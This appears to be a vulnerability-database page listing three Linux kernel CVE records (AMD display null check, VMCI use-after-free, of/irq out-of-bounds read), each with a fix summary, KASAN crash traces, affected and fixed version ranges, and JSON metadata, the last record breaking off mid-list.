Vulnerability-Lookup

Vendor	Product	Description
Ubuntu	Ubuntu	Ubuntu 16.04 ESM
Ubuntu	Ubuntu	Ubuntu 24.04 LTS
Ubuntu	Ubuntu	Ubuntu 18.04 ESM
Ubuntu	Ubuntu	Ubuntu 20.04 LTS
Ubuntu	Ubuntu	Ubuntu 14.04 ESM
Ubuntu	Ubuntu	Ubuntu 22.04 LTS

CVE-2024-46714 (GCVE-0-2024-46714)

Vulnerability from cvelistv5 – Published: 2024-09-18 06:32 – Updated: 2025-11-03 22:16

Title

drm/amd/display: Skip wbscl_set_scaler_filter if filter is null

Summary

In the Linux kernel, the following vulnerability has been resolved: drm/amd/display: Skip wbscl_set_scaler_filter if filter is null Callers can pass null in filter (i.e. from returned from the function wbscl_get_filter_coeffs_16p) and a null check is added to ensure that is not the case. This fixes 4 NULL_RETURNS issues reported by Coverity.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/0364f1f17a86d89dc…
	https://git.kernel.org/stable/c/c083c8be6bdd04604…
	https://git.kernel.org/stable/c/6d94c05a13fadd80c…
	https://git.kernel.org/stable/c/1726914cb17cedab2…
	https://git.kernel.org/stable/c/e3a95f29647ae45d1…
	https://git.kernel.org/stable/c/54834585e91cab13e…
	https://git.kernel.org/stable/c/c4d31653c03b90e51…

Impacted products

Vendor

Product

Version

Linux

Affected: 4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c , < 0364f1f17a86d89dc39040beea4f099e60189f1b (git)
Affected: 4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c , < c083c8be6bdd046049884bec076660d4ec9a19ca (git)
Affected: 4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c , < 6d94c05a13fadd80c3e732f14c83b2632ebfaa50 (git)
Affected: 4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c , < 1726914cb17cedab233820d26b86764dc08857b4 (git)
Affected: 4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c , < e3a95f29647ae45d1ec9541cd7df64f40bf2120a (git)
Affected: 4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c , < 54834585e91cab13e9f82d3a811deb212a4df786 (git)
Affected: 4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c , < c4d31653c03b90e51515b1380115d1aedad925dd (git)

Linux

Affected: 4.15
Unaffected: 0 , < 4.15 (semver)
Unaffected: 5.4.284 , ≤ 5.4.* (semver)
Unaffected: 5.10.226 , ≤ 5.10.* (semver)
Unaffected: 5.15.167 , ≤ 5.15.* (semver)
Unaffected: 6.1.109 , ≤ 6.1.* (semver)
Unaffected: 6.6.50 , ≤ 6.6.* (semver)
Unaffected: 6.10.9 , ≤ 6.10.* (semver)
Unaffected: 6.11 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-46714",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-29T14:58:41.401345Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-29T14:58:56.356Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T22:16:45.283Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2024/10/msg00003.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/gpu/drm/amd/display/dc/dcn20/dcn20_dwb_scl.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "0364f1f17a86d89dc39040beea4f099e60189f1b",
              "status": "affected",
              "version": "4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c",
              "versionType": "git"
            },
            {
              "lessThan": "c083c8be6bdd046049884bec076660d4ec9a19ca",
              "status": "affected",
              "version": "4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c",
              "versionType": "git"
            },
            {
              "lessThan": "6d94c05a13fadd80c3e732f14c83b2632ebfaa50",
              "status": "affected",
              "version": "4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c",
              "versionType": "git"
            },
            {
              "lessThan": "1726914cb17cedab233820d26b86764dc08857b4",
              "status": "affected",
              "version": "4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c",
              "versionType": "git"
            },
            {
              "lessThan": "e3a95f29647ae45d1ec9541cd7df64f40bf2120a",
              "status": "affected",
              "version": "4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c",
              "versionType": "git"
            },
            {
              "lessThan": "54834585e91cab13e9f82d3a811deb212a4df786",
              "status": "affected",
              "version": "4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c",
              "versionType": "git"
            },
            {
              "lessThan": "c4d31653c03b90e51515b1380115d1aedad925dd",
              "status": "affected",
              "version": "4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/gpu/drm/amd/display/dc/dcn20/dcn20_dwb_scl.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "4.15"
            },
            {
              "lessThan": "4.15",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.284",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.226",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.167",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.109",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.50",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.10.*",
              "status": "unaffected",
              "version": "6.10.9",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.11",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.284",
                  "versionStartIncluding": "4.15",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.226",
                  "versionStartIncluding": "4.15",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.167",
                  "versionStartIncluding": "4.15",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.109",
                  "versionStartIncluding": "4.15",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.50",
                  "versionStartIncluding": "4.15",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10.9",
                  "versionStartIncluding": "4.15",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.11",
                  "versionStartIncluding": "4.15",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/amd/display: Skip wbscl_set_scaler_filter if filter is null\n\nCallers can pass null in filter (i.e. from returned from the function\nwbscl_get_filter_coeffs_16p) and a null check is added to ensure that is\nnot the case.\n\nThis fixes 4 NULL_RETURNS issues reported by Coverity."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-07-11T17:20:18.859Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/0364f1f17a86d89dc39040beea4f099e60189f1b"
        },
        {
          "url": "https://git.kernel.org/stable/c/c083c8be6bdd046049884bec076660d4ec9a19ca"
        },
        {
          "url": "https://git.kernel.org/stable/c/6d94c05a13fadd80c3e732f14c83b2632ebfaa50"
        },
        {
          "url": "https://git.kernel.org/stable/c/1726914cb17cedab233820d26b86764dc08857b4"
        },
        {
          "url": "https://git.kernel.org/stable/c/e3a95f29647ae45d1ec9541cd7df64f40bf2120a"
        },
        {
          "url": "https://git.kernel.org/stable/c/54834585e91cab13e9f82d3a811deb212a4df786"
        },
        {
          "url": "https://git.kernel.org/stable/c/c4d31653c03b90e51515b1380115d1aedad925dd"
        }
      ],
      "title": "drm/amd/display: Skip wbscl_set_scaler_filter if filter is null",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-46714",
    "datePublished": "2024-09-18T06:32:14.852Z",
    "dateReserved": "2024-09-11T15:12:18.254Z",
    "dateUpdated": "2025-11-03T22:16:45.283Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-46738 (GCVE-0-2024-46738)

Vulnerability from cvelistv5 – Published: 2024-09-18 07:12 – Updated: 2025-11-03 22:17

Title

VMCI: Fix use-after-free when removing resource in vmci_resource_remove()

Summary

In the Linux kernel, the following vulnerability has been resolved: VMCI: Fix use-after-free when removing resource in vmci_resource_remove() When removing a resource from vmci_resource_table in vmci_resource_remove(), the search is performed using the resource handle by comparing context and resource fields. It is possible though to create two resources with different types but same handle (same context and resource fields). When trying to remove one of the resources, vmci_resource_remove() may not remove the intended one, but the object will still be freed as in the case of the datagram type in vmci_datagram_destroy_handle(). vmci_resource_table will still hold a pointer to this freed resource leading to a use-after-free vulnerability. BUG: KASAN: use-after-free in vmci_handle_is_equal include/linux/vmw_vmci_defs.h:142 [inline] BUG: KASAN: use-after-free in vmci_resource_remove+0x3a1/0x410 drivers/misc/vmw_vmci/vmci_resource.c:147 Read of size 4 at addr ffff88801c16d800 by task syz-executor197/1592 Call Trace: <TASK> __dump_stack lib/dump_stack.c:88 [inline] dump_stack_lvl+0x82/0xa9 lib/dump_stack.c:106 print_address_description.constprop.0+0x21/0x366 mm/kasan/report.c:239 __kasan_report.cold+0x7f/0x132 mm/kasan/report.c:425 kasan_report+0x38/0x51 mm/kasan/report.c:442 vmci_handle_is_equal include/linux/vmw_vmci_defs.h:142 [inline] vmci_resource_remove+0x3a1/0x410 drivers/misc/vmw_vmci/vmci_resource.c:147 vmci_qp_broker_detach+0x89a/0x11b9 drivers/misc/vmw_vmci/vmci_queue_pair.c:2182 ctx_free_ctx+0x473/0xbe1 drivers/misc/vmw_vmci/vmci_context.c:444 kref_put include/linux/kref.h:65 [inline] vmci_ctx_put drivers/misc/vmw_vmci/vmci_context.c:497 [inline] vmci_ctx_destroy+0x170/0x1d6 drivers/misc/vmw_vmci/vmci_context.c:195 vmci_host_close+0x125/0x1ac drivers/misc/vmw_vmci/vmci_host.c:143 __fput+0x261/0xa34 fs/file_table.c:282 task_work_run+0xf0/0x194 kernel/task_work.c:164 tracehook_notify_resume include/linux/tracehook.h:189 [inline] exit_to_user_mode_loop+0x184/0x189 kernel/entry/common.c:187 exit_to_user_mode_prepare+0x11b/0x123 kernel/entry/common.c:220 __syscall_exit_to_user_mode_work kernel/entry/common.c:302 [inline] syscall_exit_to_user_mode+0x18/0x42 kernel/entry/common.c:313 do_syscall_64+0x41/0x85 arch/x86/entry/common.c:86 entry_SYSCALL_64_after_hwframe+0x6e/0x0 This change ensures the type is also checked when removing the resource from vmci_resource_table in vmci_resource_remove().

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/f6365931bf7c07b2b…
	https://git.kernel.org/stable/c/b243d52b5f6f59f9d…
	https://git.kernel.org/stable/c/6c563a29857aa8053…
	https://git.kernel.org/stable/c/ef5f4d0c5ee22d4f8…
	https://git.kernel.org/stable/c/b9efdf33317446865…
	https://git.kernel.org/stable/c/39e7e593418ccdbd1…
	https://git.kernel.org/stable/c/00fe5292f081f8d77…
	https://git.kernel.org/stable/c/48b9a8dabcc3cf5f9…

Impacted products

Vendor

Product

Version

Linux

Affected: bc63dedb7d46a7d690c6b6edf69136b88af06cc6 , < f6365931bf7c07b2b397dbb06a4f6573cc9fae73 (git)
Affected: bc63dedb7d46a7d690c6b6edf69136b88af06cc6 , < b243d52b5f6f59f9d39e69b191fb3d58b94a43b1 (git)
Affected: bc63dedb7d46a7d690c6b6edf69136b88af06cc6 , < 6c563a29857aa8053b67ee141191f69757f27f6e (git)
Affected: bc63dedb7d46a7d690c6b6edf69136b88af06cc6 , < ef5f4d0c5ee22d4f873116fec844ff6edaf3fa7d (git)
Affected: bc63dedb7d46a7d690c6b6edf69136b88af06cc6 , < b9efdf333174468651be40390cbc79c9f55d9cce (git)
Affected: bc63dedb7d46a7d690c6b6edf69136b88af06cc6 , < 39e7e593418ccdbd151f2925fa6be1a616d16c96 (git)
Affected: bc63dedb7d46a7d690c6b6edf69136b88af06cc6 , < 00fe5292f081f8d773e572df8e03bf6e1855fe49 (git)
Affected: bc63dedb7d46a7d690c6b6edf69136b88af06cc6 , < 48b9a8dabcc3cf5f961b2ebcd8933bf9204babb7 (git)

Linux

Affected: 3.9
Unaffected: 0 , < 3.9 (semver)
Unaffected: 4.19.322 , ≤ 4.19.* (semver)
Unaffected: 5.4.284 , ≤ 5.4.* (semver)
Unaffected: 5.10.226 , ≤ 5.10.* (semver)
Unaffected: 5.15.167 , ≤ 5.15.* (semver)
Unaffected: 6.1.110 , ≤ 6.1.* (semver)
Unaffected: 6.6.51 , ≤ 6.6.* (semver)
Unaffected: 6.10.10 , ≤ 6.10.* (semver)
Unaffected: 6.11 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-46738",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-29T14:52:14.500763Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-29T14:52:29.053Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T22:17:23.538Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2024/10/msg00003.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/misc/vmw_vmci/vmci_resource.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "f6365931bf7c07b2b397dbb06a4f6573cc9fae73",
              "status": "affected",
              "version": "bc63dedb7d46a7d690c6b6edf69136b88af06cc6",
              "versionType": "git"
            },
            {
              "lessThan": "b243d52b5f6f59f9d39e69b191fb3d58b94a43b1",
              "status": "affected",
              "version": "bc63dedb7d46a7d690c6b6edf69136b88af06cc6",
              "versionType": "git"
            },
            {
              "lessThan": "6c563a29857aa8053b67ee141191f69757f27f6e",
              "status": "affected",
              "version": "bc63dedb7d46a7d690c6b6edf69136b88af06cc6",
              "versionType": "git"
            },
            {
              "lessThan": "ef5f4d0c5ee22d4f873116fec844ff6edaf3fa7d",
              "status": "affected",
              "version": "bc63dedb7d46a7d690c6b6edf69136b88af06cc6",
              "versionType": "git"
            },
            {
              "lessThan": "b9efdf333174468651be40390cbc79c9f55d9cce",
              "status": "affected",
              "version": "bc63dedb7d46a7d690c6b6edf69136b88af06cc6",
              "versionType": "git"
            },
            {
              "lessThan": "39e7e593418ccdbd151f2925fa6be1a616d16c96",
              "status": "affected",
              "version": "bc63dedb7d46a7d690c6b6edf69136b88af06cc6",
              "versionType": "git"
            },
            {
              "lessThan": "00fe5292f081f8d773e572df8e03bf6e1855fe49",
              "status": "affected",
              "version": "bc63dedb7d46a7d690c6b6edf69136b88af06cc6",
              "versionType": "git"
            },
            {
              "lessThan": "48b9a8dabcc3cf5f961b2ebcd8933bf9204babb7",
              "status": "affected",
              "version": "bc63dedb7d46a7d690c6b6edf69136b88af06cc6",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/misc/vmw_vmci/vmci_resource.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "3.9"
            },
            {
              "lessThan": "3.9",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.322",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.284",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.226",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.167",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.110",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.51",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.10.*",
              "status": "unaffected",
              "version": "6.10.10",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.11",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.322",
                  "versionStartIncluding": "3.9",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.284",
                  "versionStartIncluding": "3.9",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.226",
                  "versionStartIncluding": "3.9",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.167",
                  "versionStartIncluding": "3.9",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.110",
                  "versionStartIncluding": "3.9",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.51",
                  "versionStartIncluding": "3.9",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10.10",
                  "versionStartIncluding": "3.9",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.11",
                  "versionStartIncluding": "3.9",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nVMCI: Fix use-after-free when removing resource in vmci_resource_remove()\n\nWhen removing a resource from vmci_resource_table in\nvmci_resource_remove(), the search is performed using the resource\nhandle by comparing context and resource fields.\n\nIt is possible though to create two resources with different types\nbut same handle (same context and resource fields).\n\nWhen trying to remove one of the resources, vmci_resource_remove()\nmay not remove the intended one, but the object will still be freed\nas in the case of the datagram type in vmci_datagram_destroy_handle().\nvmci_resource_table will still hold a pointer to this freed resource\nleading to a use-after-free vulnerability.\n\nBUG: KASAN: use-after-free in vmci_handle_is_equal include/linux/vmw_vmci_defs.h:142 [inline]\nBUG: KASAN: use-after-free in vmci_resource_remove+0x3a1/0x410 drivers/misc/vmw_vmci/vmci_resource.c:147\nRead of size 4 at addr ffff88801c16d800 by task syz-executor197/1592\nCall Trace:\n \u003cTASK\u003e\n __dump_stack lib/dump_stack.c:88 [inline]\n dump_stack_lvl+0x82/0xa9 lib/dump_stack.c:106\n print_address_description.constprop.0+0x21/0x366 mm/kasan/report.c:239\n __kasan_report.cold+0x7f/0x132 mm/kasan/report.c:425\n kasan_report+0x38/0x51 mm/kasan/report.c:442\n vmci_handle_is_equal include/linux/vmw_vmci_defs.h:142 [inline]\n vmci_resource_remove+0x3a1/0x410 drivers/misc/vmw_vmci/vmci_resource.c:147\n vmci_qp_broker_detach+0x89a/0x11b9 drivers/misc/vmw_vmci/vmci_queue_pair.c:2182\n ctx_free_ctx+0x473/0xbe1 drivers/misc/vmw_vmci/vmci_context.c:444\n kref_put include/linux/kref.h:65 [inline]\n vmci_ctx_put drivers/misc/vmw_vmci/vmci_context.c:497 [inline]\n vmci_ctx_destroy+0x170/0x1d6 drivers/misc/vmw_vmci/vmci_context.c:195\n vmci_host_close+0x125/0x1ac drivers/misc/vmw_vmci/vmci_host.c:143\n __fput+0x261/0xa34 fs/file_table.c:282\n task_work_run+0xf0/0x194 kernel/task_work.c:164\n tracehook_notify_resume include/linux/tracehook.h:189 [inline]\n exit_to_user_mode_loop+0x184/0x189 kernel/entry/common.c:187\n exit_to_user_mode_prepare+0x11b/0x123 kernel/entry/common.c:220\n __syscall_exit_to_user_mode_work kernel/entry/common.c:302 [inline]\n syscall_exit_to_user_mode+0x18/0x42 kernel/entry/common.c:313\n do_syscall_64+0x41/0x85 arch/x86/entry/common.c:86\n entry_SYSCALL_64_after_hwframe+0x6e/0x0\n\nThis change ensures the type is also checked when removing\nthe resource from vmci_resource_table in vmci_resource_remove()."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:33:06.599Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/f6365931bf7c07b2b397dbb06a4f6573cc9fae73"
        },
        {
          "url": "https://git.kernel.org/stable/c/b243d52b5f6f59f9d39e69b191fb3d58b94a43b1"
        },
        {
          "url": "https://git.kernel.org/stable/c/6c563a29857aa8053b67ee141191f69757f27f6e"
        },
        {
          "url": "https://git.kernel.org/stable/c/ef5f4d0c5ee22d4f873116fec844ff6edaf3fa7d"
        },
        {
          "url": "https://git.kernel.org/stable/c/b9efdf333174468651be40390cbc79c9f55d9cce"
        },
        {
          "url": "https://git.kernel.org/stable/c/39e7e593418ccdbd151f2925fa6be1a616d16c96"
        },
        {
          "url": "https://git.kernel.org/stable/c/00fe5292f081f8d773e572df8e03bf6e1855fe49"
        },
        {
          "url": "https://git.kernel.org/stable/c/48b9a8dabcc3cf5f961b2ebcd8933bf9204babb7"
        }
      ],
      "title": "VMCI: Fix use-after-free when removing resource in vmci_resource_remove()",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-46738",
    "datePublished": "2024-09-18T07:12:00.131Z",
    "dateReserved": "2024-09-11T15:12:18.263Z",
    "dateUpdated": "2025-11-03T22:17:23.538Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-46743 (GCVE-0-2024-46743)

Vulnerability from cvelistv5 – Published: 2024-09-18 07:12 – Updated: 2026-01-05 10:52

Title

of/irq: Prevent device address out-of-bounds read in interrupt map walk

Summary

In the Linux kernel, the following vulnerability has been resolved: of/irq: Prevent device address out-of-bounds read in interrupt map walk When of_irq_parse_raw() is invoked with a device address smaller than the interrupt parent node (from #address-cells property), KASAN detects the following out-of-bounds read when populating the initial match table (dyndbg="func of_irq_parse_* +p"): OF: of_irq_parse_one: dev=/soc@0/picasso/watchdog, index=0 OF: parent=/soc@0/pci@878000000000/gpio0@17,0, intsize=2 OF: intspec=4 OF: of_irq_parse_raw: ipar=/soc@0/pci@878000000000/gpio0@17,0, size=2 OF: -> addrsize=3 ================================================================== BUG: KASAN: slab-out-of-bounds in of_irq_parse_raw+0x2b8/0x8d0 Read of size 4 at addr ffffff81beca5608 by task bash/764 CPU: 1 PID: 764 Comm: bash Tainted: G O 6.1.67-484c613561-nokia_sm_arm64 #1 Hardware name: Unknown Unknown Product/Unknown Product, BIOS 2023.01-12.24.03-dirty 01/01/2023 Call trace: dump_backtrace+0xdc/0x130 show_stack+0x1c/0x30 dump_stack_lvl+0x6c/0x84 print_report+0x150/0x448 kasan_report+0x98/0x140 __asan_load4+0x78/0xa0 of_irq_parse_raw+0x2b8/0x8d0 of_irq_parse_one+0x24c/0x270 parse_interrupts+0xc0/0x120 of_fwnode_add_links+0x100/0x2d0 fw_devlink_parse_fwtree+0x64/0xc0 device_add+0xb38/0xc30 of_device_add+0x64/0x90 of_platform_device_create_pdata+0xd0/0x170 of_platform_bus_create+0x244/0x600 of_platform_notify+0x1b0/0x254 blocking_notifier_call_chain+0x9c/0xd0 __of_changeset_entry_notify+0x1b8/0x230 __of_changeset_apply_notify+0x54/0xe4 of_overlay_fdt_apply+0xc04/0xd94 ... The buggy address belongs to the object at ffffff81beca5600 which belongs to the cache kmalloc-128 of size 128 The buggy address is located 8 bytes inside of 128-byte region [ffffff81beca5600, ffffff81beca5680) The buggy address belongs to the physical page: page:00000000230d3d03 refcount:1 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0x1beca4 head:00000000230d3d03 order:1 compound_mapcount:0 compound_pincount:0 flags: 0x8000000000010200(slab|head|zone=2) raw: 8000000000010200 0000000000000000 dead000000000122 ffffff810000c300 raw: 0000000000000000 0000000000200020 00000001ffffffff 0000000000000000 page dumped because: kasan: bad access detected Memory state around the buggy address: ffffff81beca5500: 04 fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc ffffff81beca5580: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc >ffffff81beca5600: 00 fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc ^ ffffff81beca5680: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc ffffff81beca5700: 00 00 00 00 00 00 fc fc fc fc fc fc fc fc fc fc ================================================================== OF: -> got it ! Prevent the out-of-bounds read by copying the device address into a buffer of sufficient size.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/d2a79494d8a526294…
	https://git.kernel.org/stable/c/defcaa426ba0bc89f…
	https://git.kernel.org/stable/c/9d1e9f0876b03d74d…
	https://git.kernel.org/stable/c/baaf26723beab3a04…
	https://git.kernel.org/stable/c/8ff351ea12e918db1…
	https://git.kernel.org/stable/c/7ead730af11ee7da1…
	https://git.kernel.org/stable/c/bf68acd840b6a5bfd…
	https://git.kernel.org/stable/c/b739dffa5d570b411…

Impacted products

Vendor

Product

Version

Linux

Affected: cc9fd71c62f542233c412b5fabc1bbe0c4d5ad08 , < d2a79494d8a5262949736fb2c3ac44d20a51b0d8 (git)
Affected: cc9fd71c62f542233c412b5fabc1bbe0c4d5ad08 , < defcaa426ba0bc89ffdafb799d2e50b52f74ffc4 (git)
Affected: cc9fd71c62f542233c412b5fabc1bbe0c4d5ad08 , < 9d1e9f0876b03d74d44513a0ed3ed15ef8f2fed5 (git)
Affected: cc9fd71c62f542233c412b5fabc1bbe0c4d5ad08 , < baaf26723beab3a04da578d3008be3544f83758f (git)
Affected: cc9fd71c62f542233c412b5fabc1bbe0c4d5ad08 , < 8ff351ea12e918db1373b915c4c268815929cbe5 (git)
Affected: cc9fd71c62f542233c412b5fabc1bbe0c4d5ad08 , < 7ead730af11ee7da107f16fc77995613c58d292d (git)
Affected: cc9fd71c62f542233c412b5fabc1bbe0c4d5ad08 , < bf68acd840b6a5bfd3777e0d5aaa204db6b461a9 (git)
